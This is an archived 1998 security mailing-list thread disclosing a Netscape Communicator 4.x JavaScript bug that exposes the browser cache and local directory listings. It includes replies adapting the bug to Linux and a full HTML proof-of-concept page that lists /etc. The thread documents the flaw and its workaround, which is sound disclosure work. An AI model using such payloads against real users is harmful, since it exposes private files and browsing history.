netscape.4.x-javascript-unix.txt

`Date: Thu, 29 Oct 1998 17:09:23 -0600  
From: Ryan Gray <[email protected]>  
To: [email protected]  
Subject: Re: Javascript bug in Netscape Communicator 4.5  
  
Hello,  
Just wanted to add that Netscape Communicator 4.5b2 on Slackware  
Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get  
the script to read my cache. As for the local reading, with a little  
modification, it'll do that to.  
  
Example:  
the line in George's script that reads local files is -  
sl=window.open('wysiwyg://1/file:///c|/');  
  
With just little change, taking the Linux directory structure into  
consideration and adding proper backslash escapes -  
sl=window.open('wysiwyg://1/file://\/');  
  
That'll give you listing of '/' on the local box. (tsk, tsk, tsk)  
  
Regards,  
Ryan Gray  
http://www.sniper.org - Home of the Afterlife  
  
-----------------------------------------------------------  
  
Date: Thu, 29 Oct 1998 11:59:05 +0100  
From: Willy TARREAU <[email protected]>  
To: [email protected]  
Subject: Re: Javascript bug in Netscape Communicator 4.5  
  
>  
> There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95  
> (probably others) which allows reading user's cache (the urls the user  
> has  
> visited, including the info in GET forms). Reading local directories  
> content  
> is also allowed. This info may be sent to an arbitrary host.  
> The bug may be exploited by email.  
  
it also works under Linux, and probably other Unixes as demonstrated by the  
slightly modified copy I've made from your page which can be accessed at :  
  
http://www-miaif.lip6.fr/willy/security/netscape.html  
  
> Workaround: Disable Javascript.  
> Regards,  
> Georgi Guninski  
> http://www.geocities.com/ResearchTriangle/1711/  
>  
Willy  
  
--  
+----------------------------------------------------------------------------+  
| Willy Tarreau - [email protected] - http://www-miaif.lip6.fr/willy/ |  
| System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |  
| Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |  
+----------------------------------------------------------------------------+  
  
-----------------------------------------------------------  
  
There is a new bug in Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (probably others) which allows reading the user's cache (including the  
info in GET forms.) Reading directories' contents is also possible. This information may be sent to an arbitrary host.   
This page shows that this also works on Unix. It will show you the files in /etc.   
Workaround: Disable Javascript.   
  
-----------------------------------------------------------  
  
<HTML>  
<HEAD>  
  
<TITLE>Browse directories with Netscape 4.5 </TITLE></HEAD>  
  
<BODY>  
<P>  
There is a new bug in Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (probably others) which allows reading the user's cache (including the info in GET forms.)  
Reading directories' contents is also possible. This information may be sent to an arbitrary host.  
<BR>  
This page shows that this also works on Unix. It will show you the files  
in /etc.  
<BR>  
Workaround: Disable Javascript.  
  
  
<BR>  
<BR>  
  
  
  
<SCRIPT>  
  
  
sl=window.open('wysiwyg://1/file:///etc/');  
sl2=sl.window.open();  
sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some files in your /etc\"; for(i=1;i<6;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";  
sl2.location.reload();  
  
</SCRIPT>  
  
  
<BR>  
<A HREF="http://www.geocities.com/ResearchTriangle/1711">  
Go to Georgi Guninski's home page  
</A>  
<BR>  
<A HREF="http://www-miaif.lip6.fr/willy/">  
Go to Willy Tarreau's home page  
</A>  
  
</BODY>  
</HTML>  
  
`